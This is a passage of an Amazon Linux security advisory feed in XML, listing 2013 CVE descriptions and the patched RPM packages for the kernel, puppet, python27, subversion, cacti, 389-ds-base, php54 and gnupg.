id="CVE-2013-2635" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2852" title="" id="CVE-2013-2852" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3222" title="" id="CVE-2013-3222" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3224" title="" id="CVE-2013-3224" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3225" title="" id="CVE-2013-3225" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3301" title="" id="CVE-2013-3301" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-debuginfo" version="3.4.57" release="48.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.4.57-48.42.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.4.57" release="48.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.4.57-48.42.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.4.57" release="48.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.4.57-48.42.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.4.57" release="48.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.4.57-48.42.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.4.57" release="48.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.4.57-48.42.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.4.57" release="48.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.4.57-48.42.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.4.57" release="48.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.4.57-48.42.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.4.57" release="48.42.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.4.57-48.42.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.4.57" release="48.42.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.4.57-48.42.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.4.57" release="48.42.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.4.57-48.42.amzn1.i686.rpm</filename></package><package name="kernel" version="3.4.57" release="48.42.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.4.57-48.42.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.4.57" release="48.42.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.4.57-48.42.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.4.57" release="48.42.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.4.57-48.42.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.4.57" release="48.42.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.4.57-48.42.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.4.57" release="48.42.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.4.57-48.42.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-219</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-219: medium priority package update for puppet</title><issued date="2013-09-04 13:30:00" /><updated date="2014-09-15 23:21:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4956:
Puppet Module Tool (PMT), as used in Puppet 2.7.x before 2.7.23 and 3.2.x before 3.2.4, and Puppet Enterprise 2.8.x before 2.8.3 and 3.0.x before 3.0.1, installs modules with weak permissions if those permissions were used when the modules were originally built, which might allow local users to read or modify those modules depending on the original permissions.
996855:
CVE-2013-4956 Puppet: Local Privilege Escalation/Arbitrary Code Execution
CVE-2013-4761:
Unspecified vulnerability in Puppet 2.7.x before 2.7.23 and 3.2.x before 3.2.4, and Puppet Enterprise 2.8.x before 2.8.3 and 3.0.x before 3.0.1, allows remote attackers to execute arbitrary Ruby programs from the master via the resource_type service. NOTE: this vulnerability can only be exploited utilizing unspecified "local file system access" to the Puppet Master.
996856:
CVE-2013-4761 Puppet: resource_type service code execution
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4761" title="" id="CVE-2013-4761" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4956" title="" id="CVE-2013-4956" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="puppet-debuginfo" version="2.7.23" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-debuginfo-2.7.23-1.0.amzn1.x86_64.rpm</filename></package><package name="puppet" version="2.7.23" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-2.7.23-1.0.amzn1.x86_64.rpm</filename></package><package name="puppet-server" version="2.7.23" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-server-2.7.23-1.0.amzn1.x86_64.rpm</filename></package><package name="puppet-debuginfo" version="2.7.23" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-debuginfo-2.7.23-1.0.amzn1.i686.rpm</filename></package><package name="puppet" version="2.7.23" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-2.7.23-1.0.amzn1.i686.rpm</filename></package><package name="puppet-server" version="2.7.23" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-server-2.7.23-1.0.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-220</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-220: medium priority package update for python27</title><issued date="2013-09-04 13:31:00" /><updated date="2014-09-15 23:21:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4238:
The ssl.match_hostname function in the SSL module in Python 2.6 through 3.4 does not properly handle a '\0' character in a domain name in the Subject Alternative Name field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408.
996381:
CVE-2013-4238 python: hostname check bypassing vulnerability in SSL module
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4238" title="" id="CVE-2013-4238" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-test" version="2.7.5" release="4.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.5-4.28.amzn1.x86_64.rpm</filename></package><package name="python27-debuginfo" version="2.7.5" release="4.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.5-4.28.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.5" release="4.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.5-4.28.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.5" release="4.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.5-4.28.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.5" release="4.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.5-4.28.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.5" release="4.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.5-4.28.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.5" release="4.28.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.5-4.28.amzn1.i686.rpm</filename></package><package name="python27-devel" version="2.7.5" release="4.28.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.5-4.28.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.5" release="4.28.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.5-4.28.amzn1.i686.rpm</filename></package><package name="python27-tools" version="2.7.5" release="4.28.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.5-4.28.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.5" release="4.28.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.5-4.28.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.5" release="4.28.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.5-4.28.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-221</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-221: medium priority package update for subversion</title><issued date="2013-09-04 13:32:00" /><updated date="2014-09-15 23:21:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4131:
The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.10 and 1.8.x before 1.8.1 allows remote authenticated users to cause a denial of service (assertion failure or out-of-bounds read) via a certain (1) COPY, (2) DELETE, or (3) MOVE request against a revision root.
986194:
CVE-2013-4131 subversion: DoS (assertion failure, crash) in mod_dav_svn when handling certain MOVE, COPY, or DELETE HTTP requests
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4131" title="" id="CVE-2013-4131" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="subversion-debuginfo" version="1.7.13" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-debuginfo-1.7.13-1.32.amzn1.x86_64.rpm</filename></package><package name="subversion-python" version="1.7.13" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python-1.7.13-1.32.amzn1.x86_64.rpm</filename></package><package name="subversion-libs" version="1.7.13" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-libs-1.7.13-1.32.amzn1.x86_64.rpm</filename></package><package name="subversion-javahl" version="1.7.13" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-javahl-1.7.13-1.32.amzn1.x86_64.rpm</filename></package><package name="subversion-devel" version="1.7.13" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-devel-1.7.13-1.32.amzn1.x86_64.rpm</filename></package><package name="mod_dav_svn" version="1.7.13" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_dav_svn-1.7.13-1.32.amzn1.x86_64.rpm</filename></package><package name="subversion-perl" version="1.7.13" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-perl-1.7.13-1.32.amzn1.x86_64.rpm</filename></package><package name="subversion-tools" version="1.7.13" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-tools-1.7.13-1.32.amzn1.x86_64.rpm</filename></package><package name="subversion-ruby" version="1.7.13" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-ruby-1.7.13-1.32.amzn1.x86_64.rpm</filename></package><package name="subversion" version="1.7.13" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-1.7.13-1.32.amzn1.x86_64.rpm</filename></package><package name="subversion-perl" version="1.7.13" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-perl-1.7.13-1.32.amzn1.i686.rpm</filename></package><package name="subversion-javahl" version="1.7.13" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-javahl-1.7.13-1.32.amzn1.i686.rpm</filename></package><package name="subversion-python" version="1.7.13" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-python-1.7.13-1.32.amzn1.i686.rpm</filename></package><package name="subversion-ruby" version="1.7.13" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-ruby-1.7.13-1.32.amzn1.i686.rpm</filename></package><package name="subversion-libs" version="1.7.13" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-libs-1.7.13-1.32.amzn1.i686.rpm</filename></package><package name="mod_dav_svn" version="1.7.13" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mod_dav_svn-1.7.13-1.32.amzn1.i686.rpm</filename></package><package name="subversion-tools" version="1.7.13" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-tools-1.7.13-1.32.amzn1.i686.rpm</filename></package><package name="subversion-debuginfo" version="1.7.13" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-debuginfo-1.7.13-1.32.amzn1.i686.rpm</filename></package><package name="subversion-devel" version="1.7.13" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-devel-1.7.13-1.32.amzn1.i686.rpm</filename></package><package name="subversion" version="1.7.13" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-1.7.13-1.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-222</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-222: medium priority package update for cacti</title><issued date="2013-09-04 13:33:00" /><updated date="2014-09-15 23:22:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1435:
994616:
CVE-2013-1434 CVE-2013-1435 cacti: SQL injection and shell escaping issues fixed in 0.8.8b
(1) snmp.php and (2) rrd.php in Cacti before 0.8.8b allows remote attackers to execute arbitrary commands via shell metacharacters in unspecified vectors.
CVE-2013-1434:
Multiple SQL injection vulnerabilities in (1) api_poller.php and (2) utility.php in Cacti before 0.8.8b allow remote attackers to execute arbitrary SQL commands via unspecified vectors.
994616:
CVE-2013-1434 CVE-2013-1435 cacti: SQL injection and shell escaping issues fixed in 0.8.8b
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1434" title="" id="CVE-2013-1434" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1435" title="" id="CVE-2013-1435" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cacti" version="0.8.8b" release="2.10.amzn1" epoch="0" arch="noarch"><filename>Packages/cacti-0.8.8b-2.10.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-223</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-223: important priority package update for 389-ds-base</title><issued date="2013-09-19 15:02:00" /><updated date="2014-09-15 23:23:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4283:
ns-slapd in 389 Directory Server before 1.3.0.8 allows remote attackers to cause a denial of service (server crash) via a crafted Distinguished Name (DN) in a MOD operation request.
It was discovered that the 389 Directory Server did not properly handle the receipt of certain MOD operations with a bogus Distinguished Name (DN). A remote, unauthenticated attacker could use this flaw to cause the 389 Directory Server to crash.
999634:
CVE-2013-4283 389-ds-base: ns-slapd crash due to bogus DN
CVE-2013-2219:
The Red Hat Directory Server before 8.2.11-13 and 389 Directory Server do not properly restrict access to entity attributes, which allows remote authenticated users to obtain sensitive information via a search query for the attribute.
It was discovered that the 389 Directory Server did not honor defined attribute access controls when evaluating search filter expressions. A remote attacker (with permission to query the Directory Server) could use this flaw to determine the values of restricted attributes via a series of search queries with filter conditions that used restricted attributes.
979508:
CVE-2013-2219 Directory Server: ACLs inoperative in some search scenarios
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2219" title="" id="CVE-2013-2219" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4283" title="" id="CVE-2013-4283" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base-debuginfo" version="1.3.1.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.1.8-1.5.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.1.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.1.8-1.5.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.1.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.1.8-1.5.amzn1.x86_64.rpm</filename></package><package name="389-ds-base" version="1.3.1.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.1.8-1.5.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.1.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.1.8-1.5.amzn1.i686.rpm</filename></package><package name="389-ds-base" version="1.3.1.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.1.8-1.5.amzn1.i686.rpm</filename></package><package name="389-ds-base-libs" version="1.3.1.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.1.8-1.5.amzn1.i686.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.1.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.1.8-1.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-224</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-224: medium priority package update for php54</title><issued date="2013-09-19 15:28:00" /><updated date="2014-09-15 23:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4248:
The openssl_x509_parse function in openssl.c in the OpenSSL module in PHP before 5.4.18 and 5.5.x before 5.5.2 does not properly handle a '\0' character in a domain name in the Subject Alternative Name field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408.
997097:
CVE-2013-4248 php: hostname check bypassing vulnerability in SSL client
CVE-2011-4718:
Session fixation vulnerability in the Sessions subsystem in PHP before 5.5.2 allows remote attackers to hijack web sessions by specifying a session ID.
996774:
CVE-2011-4718 php: session fixation vulnerability allows remote hijacking of sessions
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4718" title="" id="CVE-2011-4718" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4248" title="" id="CVE-2013-4248" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-odbc" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-odbc-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-mysql" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-debuginfo-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-pgsql" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-fpm" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-process" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-process-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-dba" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-imap" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-imap-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-enchant-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-soap" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-soap-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mssql-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-gd-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pdo-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-mbstring" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mbstring-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-common" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-intl" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-ldap" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-devel-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-mcrypt" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.19" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.19-1.42.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-devel-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-pdo" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-gd" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-gd-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-snmp" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-embedded" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-embedded-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-tidy" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-tidy-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-mysqlnd" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysqlnd-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-mssql" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mssql-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-mbstring" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mbstring-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-ldap" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-dba-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-imap" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-xmlrpc" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xmlrpc-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-pspell" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-fpm-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-common" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-common-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-bcmath" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-bcmath-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-xml" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pgsql-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-mysql" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysql-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-cli-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-odbc" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-odbc-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-enchant" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-enchant-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-debuginfo" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-debuginfo-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-recode" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-soap" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-process-5.4.19-1.42.amzn1.i686.rpm</filename></package><package name="php54-mcrypt" version="5.4.19" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mcrypt-5.4.19-1.42.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-225</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-225: medium priority package update for gnupg</title><issued date="2013-09-19 15:29:00" /><updated date="2014-09-15 23:24:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4242:
GnuPG before 1.4.14, and Libgcrypt before 1.5.3 as used in GnuPG 2.0.x and possibly other products, allows local users to obtain private RSA keys via a cache side-channel attack involving the L3 cache, aka Flush+Reload.
988589:
CVE-2013-4242 GnuPG susceptible to Yarom/Falkner flush+reload cache side-channel attack
